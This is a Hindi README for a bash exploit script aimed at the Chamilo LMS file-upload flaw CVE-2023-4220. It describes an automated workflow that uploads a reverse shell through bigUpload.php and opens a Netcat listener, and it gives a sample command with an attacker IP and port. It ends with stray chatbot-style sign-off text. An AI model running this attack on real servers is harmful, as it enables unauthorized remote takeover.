
bash में लिखा गया Chamilo LMS CVE-2023-4220 एक्सप्लॉइट का पुनर्निर्मित संस्करण
यह स्क्रिप्ट Chamilo LMS के ≤ v1.11.24 संस्करणों में एक रिमोट कोड निष्पादन (RCE) कमजोरी का शोषण करती है। यह कमजोरी (CVE-2023-4220) Chamilo LMS के bigUpload.php फीचर में असीमित फ़ाइल अपलोड कार्यक्षमता के कारण मौजूद है, जो हमलावरों को मनमानी फ़ाइलें (जैसे वेब शेल) अपलोड करने और उन्हें निष्पादित करने की अनुमति देती है, जिससे सर्वर पर पूर्ण रिमोट कोड निष्पादन होता है।
इस स्क्रिप्ट को Divine Clown द्वारा संवर्धित किया गया है ताकि शोषण प्रक्रिया को सुव्यवस्थित किया जा सके, स्वचालित रूप से एक रिवर्स शेल फ़ाइल उत्पन्न कर सके, इसे लक्ष्य पर अपलोड कर सके, और हमलावर को शेल तक सीधी पहुँच देने के लिए एक श्रोता (listener) प्रारंभ कर सके।
/main/inc/lib/javascript/bigupload/inc/bigUpload.php में असीमित फ़ाइल अपलोडbigUpload.php एंडपॉइंट का उपयोग करके रिवर्स शेल अपलोड करता है।./CVE-2023-4220.sh -i <attacker_ip> -p <port> -h <host_link>
-i <attacker_ip>: रिवर्स शेल के लिए हमलावर का IP पता।-p <port>: वह पोर्ट जहाँ Netcat श्रोता शुरू किया जाएगा।-h <host_link>: कमजोर Chamilo LMS इंस्टेंस का पूरा URL।./CVE-2023-4220.sh -i 10.10.14.15 -p 9001 -h http://target-site.com
यह उपकरण केवल शैक्षिक उद्देश्यों और परीक्षण वातावरणों के लिए है जहाँ आपके पास कमजोरियों का शोषण करने की स्पष्ट अनुमति है। सिस्टम तक अनधिकृत पहुँच अवैध है और इसके परिणामस्वरूप आपराधिक आरोप लग सकते हैं। लेखक इस स्क्रिप्ट के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं होंगे।
यदि आप कोई अतिरिक्त जानकारी या फ़ॉर्मेटिंग शामिल करना चाहते हैं तो README को और संशोधित करने के लिए स्वतंत्र महसूस करें! यदि आपको किसी और चीज़ की आवश्यकता हो तो मुझे बताएं।